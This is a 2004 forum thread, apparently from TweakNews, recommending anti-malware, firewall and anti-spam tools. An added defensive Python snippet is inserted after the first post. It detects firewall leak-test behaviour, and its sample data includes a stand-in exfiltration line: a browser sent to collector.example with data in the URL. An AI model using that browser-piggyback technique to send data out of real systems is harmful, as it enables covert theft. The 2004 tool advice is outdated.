


[Malware] - your experience

 
Diales
TweakNOOB


Joined: 31 Aug 2003
Posts: 91

Posted: Sat Aug 28, 2004 12:56 pm    Post subject: [Malware] - your experience

Do we have an expert who can tell us more about malware?
I'm not. Please correct me if something is wrong.

Malware (Malicious Software) consists of:
- Virus (Blended Attacks Exploits, Vulnerabilities, Buffer-Overflow ...)
- Worms (Denial of Service Attack [DOS], Spamserver-Host ...)
- Trojan Horses
- Dialer
- Spyware
- Adware
- Keylogger
- Software bugs
- Hijacker
- Phishing
- E-mail Scams
- Logic-, ANSI bombs
- Instant Messaging: bombing, flooding, spamming, spoofing
- Joke Programs
- (Spy-, tracking cookies)
- Bugs

Not malicious software
- Hoaxes (fake warnings)
- Chain letters
- Spammails

There are already two topics in this forum about "the best virus scanner" or similar. Do you also care about the other malware, or didn't you know that they exist, or did you even believe that your virus scanner detects all kinds of malware?

Question of the day: is one virus scanner enough to prevent us from malware? :)


How do I protect myself?

A) Brain 1.0
"Think before you click OK!"
And I don't use Internet Explorer (exception www.tweaknews.net), Outlook, Outlook Express.
Instead of them, I use for browsing "Mozilla Firefox 0.9.3 (Firebird)" - faster, more safely and efficiently than with any other browser with a lot of free add-ons.
Info, download English: http://www.mozilla.org/products/firefox/
Info, download German: http://www.firebird-browser.de/

and for e-mail "Pegasus Mail 3.21c"
Amazing software :) Powerful and good protection against vulnerabilities.
Info English, German: http://www.pmail.com/
Download English: ftp://pegasus.uni-mannheim.de/pegasus/winpmail/w32-421c.exe
Download German: ftp://pegasus.uni-mannheim.de/pegasus/winpmail/language/de/421/w32-421c-de1.exe


B) Protection against Virus, Worms, Trojan horses, Dialer, Keylogger
I'm using G-Data AntiVirenkit 2004 (commercial, soon 2005 version available) which consists of the two scan-engines:
- Kaspersky (a good scanner for all kinds of compressed files [zip, tar.gz, ...])
- Bitdefender
Both engines work pretty well together, but this software slows down your computer. It's recommended to use a Pentium 4 at minimum. What I like about this software is that G-Data AntiVirenkit 2004 has strong heuristic search engines. That means they recognise malicious code even if they don't know the viruses or worms yet (no signature available at the moment). This way, you can avoid being infected by malware which was constructed by script kiddies (who use 3rd party tools to create their viruses, worms… - they don't write their own software).

Although your background scanner protects you from current viruses, it's recommended to scan your PC every month with the current virus signatures. You never know if your background scanner failed in the past. I do this regularly. I've been using G-Data for two years. Until now, I have just found two viruses on five computers which the guard missed. But it was my mistake: I forgot to enable compressed file scanning. So, rescan your hard disk with the updated signature file and have a look at how reliable your software was :).

Personal ranking of anti-virus programs (version 2005 soon available) for WinXP - just my opinion:
1. AntiVirenkit 2004 (Bitdefender, Kaspersky)
2. F-Secure Internet Security 2004
3. McAfee VirusScan 2004
4. Kaspersky Antivirus Personal 5.0 (single version)

I don't like the following software, because I found more than 3 viruses or Trojan Horses... after a manual scan with updated virus signatures in the past (maybe caused by bad heuristic scanner). In my opinion, there’s room for an improvement:
- Antivir (free edition)
- AVG (free edition)
- Command Anti-Virus
- eTrust AV (Iris,VET-Engine)
- Nod32
- Norman Virus Control
- Norton Anti-Virus 2003/2004
- Panda Anti-Virus Titanium 2004
- Sophos Anti-Virus

If you’re not keen on buying anti-virus software, check your PC with this freeware tool (download the newest version every time): McAfee AVERT Stinger
“Stinger is a stand-alone utility used to detect and remove specific viruses. It is not a substitute for full anti-virus protection, but rather a tool to assist administrators and users when dealing with an infected system. Stinger utilizes next generation scan engine technology, including process scanning, digitally signed DAT files, and scan performance optimizations.”
Info: http://vil.nai.com/vil/stinger/
Download: http://download.nai.com/products/mcafee-avert/stinger.exe


C) 2nd protection against Trojan Horses, Dialer, Keylogger
Commercial:
1. Trojan Hunter 3.9 (background scanner)
2. TDS-3 (On-demand scanner - I have to start a scan manually. Version 4 – coming soon)
3. a2 squared 1.0 personal (background scanner - I use it as an on-demand scanner, otherwise my system becomes unstable. Version 2.0 – coming soon).
Freeware on-demand scanner available: http://www.emsisoft.com/en/software/free/. I didn't know that it would make my PC unstable. That's why I bought the personal edition. Other commercial software: Tauscan, BoClean, The Cleaner. They haven't found infected files in the past (more than twice). Since then, I don't use them anymore.


D) Protection against Spyware, Adware
Freeware:
1. Spybot Search & Destroy 1.3
Info: http://www.safer-networking.org
Download: http://www.majorgeeks.com/download.php?det=2471

2. Lavasoft Ad-Aware Personal SE 1.3
Info: http://www.lavasoftusa.com/software/adaware/
Download: http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button

3. SpywareBlaster 3.2 + SpywareGuard 2.2
Info: http://www.javacoolsoftware.com/spywareblaster.html
Info: http://www.javacoolsoftware.com/spywareguard.html
Download: http://www.javacoolsoftware.com/sbdownload.html
Download: http://www.javacoolsoftware.com/sgdownload.html

Commercial:
Pestpatrol Home Users 4.x
Info: http://www.pestpatrol.com/Products/PestPatrolHE/

Other commercial software: I also tried Spysweeper 2.0, but I uninstalled it later because it made my PC unstable. I also dislike Adware Remover Gold, AntiSpion (Databecker), AntiSpy, AntiSpyware (Network Associates), Bazooka Spyware Scanner, BPS Spyware Remover, SpyHunter, SpyRemover, SpySubtract, Spyware Eliminator, TZ-Spy Ad-Remover, XoftSpy. But this is my personal opinion.


E) Protection against Hijacker
1. CWShredder 1.59.1 (thanks Nathan!)
CWShredder is a small utility for removing CoolWebSearch (aka CoolWwwSearch, YouFindAll, White-Pages.ws and a dozen other names).
Info / download unofficial: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

2. HijackThis 1.97.7
HijackThis is a tool that lists all installed browser add-ons, buttons and startup items, and allows you to inspect and optionally remove selected items.
Info / download unofficial: http://www.spychecker.com/program/hijackthis.html
Info official: http://www.spywareinfo.com/%7Emerijn/downloads.html - webserver was down at the time


How about a software firewall? Some keywords: Intrusion Detection System, Stateful-Packet-Inspection, Portscan, DoS Attacks, MAC spoofing, IP spoofing, NetBios attacks, Hijacking, DLL-Injection.

Yes. I installed a Zyxel Hardware Firewall.

F) Protection against disallowed software-access to internet and rejecting of unwanted data packets
I have experience with the following freeware products: Kerio Personal Firewall, Outpost Personal Firewall, SecurePoint Personal Firewall, Sygate Personal Firewall, ZoneAlarm.

In my opinion "Sygate Personal Firewall" offers the best protection. It's a tool for experienced users. It offers quite good packet filtering and a log function. ZoneAlarm is my second choice and good for beginners (you can choose pre-set packet filtering for certain programs). Both programs closed all ports and didn't answer any portscans. You can set your own packet filtering rules. But ZoneAlarm failed in two important points:
a) it doesn't block well-known spam and dialer websites - all other firewalls did that.
b) it failed the Tooleaky test. This is software (for testing firewalls) which tries to send and receive information over Internet Explorer. A good firewall should recognize that 3rd party software abuses its rights. At first, I didn't believe that this works, because I read the opposite on different websites. But unfortunately it is true. That means a Trojan Horse can send information over a program like Internet Explorer, which has the right to connect to the internet. I hope ZoneLabs will fix that soon. Otherwise ZoneAlarm is quite a good firewall for most needs. Easy to install and well explained.


Fight against Spam
"Spampal" (freeware): "SpamPal is a mail classification program that can help separate your spam from the mail you really want to read." A very powerful Anti-Spam software with a lot of plugins. You can even use public blacklists like Spamhaus SBL+XBL, ORDB, Spamcop, SpamBag, NJABL, DSBL, SORBS, SPEWS ...

Info, Download - English and other languages http://www.spampal.org/

Finally, I’m not a native speaker - sorry for my English. Anyway, thanks for your feedback.
_________________
Malware: http://www.tweaknews.net/forum/viewtopic.php?t=3395 | https://netfiles.uiuc.edu/ehowes/www/main-nf.htm

Benchmark Software: http://www.benchmarkhq.ru/english.html?/b_e.html

How to build your own computer: http://www.pcmech.com/byopc/
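
The leak-test point in the post above (a program without network rights sending data through Internet Explorer, which has them) can be checked for in process-creation logs. This is an added example, not part of the original post or of any product named in it; it assumes the data travels in the URL the browser is started with, and the event records, `updater.exe`, `collector.example`, the allow-list and the threshold are all constructed for illustration.

```python
# Added example: flag a trusted browser that was started by an unexpected
# program, the pattern a firewall leak test relies on.
# All events below are constructed sample data, not real logs.
from urllib.parse import urlsplit

BROWSERS = {"iexplore.exe"}
EXPECTED_PARENTS = {"explorer.exe"}   # assumed allow-list; tune per machine
MAX_QUERY = 32                        # assumed threshold for "data in the URL"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"

EVENTS = [
    {"parent": r"C:\WINDOWS\explorer.exe", "image": IE, "cmdline": "iexplore.exe"},
    {"parent": r"C:\WINDOWS\explorer.exe", "image": IE,
     "cmdline": "iexplore.exe http://www.tweaknews.net/forum/"},
    {"parent": r"C:\Temp\updater.exe", "image": IE,          # hypothetical program
     "cmdline": f'"{IE}" http://collector.example/c?d=' + "A" * 40},
    {"parent": r"C:\Temp\updater.exe", "image": r"C:\WINDOWS\notepad.exe",
     "cmdline": "notepad.exe"},
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def url_argument(cmdline):
    """First http(s) URL passed on the command line, or None."""
    for token in cmdline.split():
        token = token.strip('"')
        if token.lower().startswith(("http://", "https://")):
            return token
    return None

def assess(event):
    """Reasons this event looks like traffic piggy-backed on the browser."""
    if basename(event["image"]) not in BROWSERS:
        return []
    parent = basename(event["parent"])
    if parent in EXPECTED_PARENTS:
        return []
    reasons = [f"browser started by unexpected parent {parent}"]
    url = url_argument(event["cmdline"])
    if url and len(urlsplit(url).query) > MAX_QUERY:
        reasons.append(f"{len(urlsplit(url).query)} bytes of query data in start URL")
    return reasons

def flagged(events):
    """(parent, reasons) for every event with at least one reason."""
    return [(basename(e["parent"]), assess(e)) for e in events if assess(e)]

if __name__ == "__main__":
    for parent, reasons in flagged(EVENTS):
        print(parent, "->", "; ".join(reasons))
```

A program that legitimately opens links in the browser, such as a mail client, would need to be added to the allow-list to avoid false positives.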
ToggleHead
TWEAKGURU


Joined: 03 Mar 2004
Posts: 4360
Location: Jersey

Posted: Sat Aug 28, 2004 3:15 pm

where do you get these wonderful toys.......=]
a cookie goes to who can name the movie this quote is from.....its an easy one


good post man....what's your source......? =]
Ham_fisT
Lord of the Tweak


Joined: 20 Jun 2004
Posts: 2244
Location: Gone Fishin'

Posted: Sat Aug 28, 2004 3:27 pm

BATMAN Gimme my COOKIE

Great post there...all the Malware links I could ever ask for
_________________
Yeah....... ok
2old2care
Lord of the Tweak


Joined: 09 Jul 2004
Posts: 2817
Location: Pssst....Over Here

Posted: Sat Aug 28, 2004 3:52 pm

Isn't the object here in malware land NOT to get a "cookie"?
_________________
.
Liquid-Cooled Q9450 and an EeePC
.
Silicon Skum
UberTweaker


Joined: 26 Jul 2004
Posts: 1156
Location: UK, Geordie land

Posted: Sat Aug 28, 2004 4:57 pm

ToggleHead wrote:
where do you get these wonderful toys.......=]
a cookie goes to who can name the movie this quote is from.....its an easy one

Mall Rats! Jay said it to Silent Bob as they were getting chased by La'forres and a whole bunch of Mall security guards, when he pulls out a batman style grappling hook gun. The inflated sex doll he pulls out of his coat first. Heh, Nice!

Great info on that post, could have done with the info a few weeks ago when I got stuck with Coolwebsearch (or Crapsearch as I call it).

SS
Diales
TweakNOOB


Joined: 31 Aug 2003
Posts: 91

Posted: Sat Aug 28, 2004 5:45 pm

hehe, this time own source.
cookies? drink a cup of milk - cheers!
ToggleHead
TWEAKGURU


Joined: 03 Mar 2004
Posts: 4360
Location: Jersey

Posted: Sat Aug 28, 2004 6:29 pm

again...nice post......=]

both ham and ss are right....good job guys
Josh
TWEAKGURU


Joined: 22 Feb 2004
Posts: 4192
Location: United States of Kindom

Posted: Thu Sep 02, 2004 4:12 pm

great post....calling for stickyness :)
JayDubya
TWEAKGURU


Joined: 01 Oct 2003
Posts: 5496
Location: ames, ia

Posted: Thu Sep 02, 2004 5:53 pm

Wow, this is very nice. You really do your research.
_________________
JayDubya aka JW Jay JD ^> ﺵ
Josh
TWEAKGURU


Joined: 22 Feb 2004
Posts: 4192
Location: United States of Kindom

Posted: Fri Sep 03, 2004 5:56 pm

JayDubya wrote:
Wow, this is very nice. You really do your research.


Or you enjoy pressing ctrl+c and ctrl+v a lot
King Asgarnia
SirTweaksabit


Joined: 12 Feb 2004
Posts: 371
Location: Chicago

Posted: Fri Sep 03, 2004 9:39 pm

second for stickyness. KILL THOSE MALWARE!!! KILL AND QUARANTINE AND DELETE THEM ALL!!! AND THE MAKERS OF THEM!!! BUUUUUURRRRNNNNN!!
All times are GMT - 5 Hours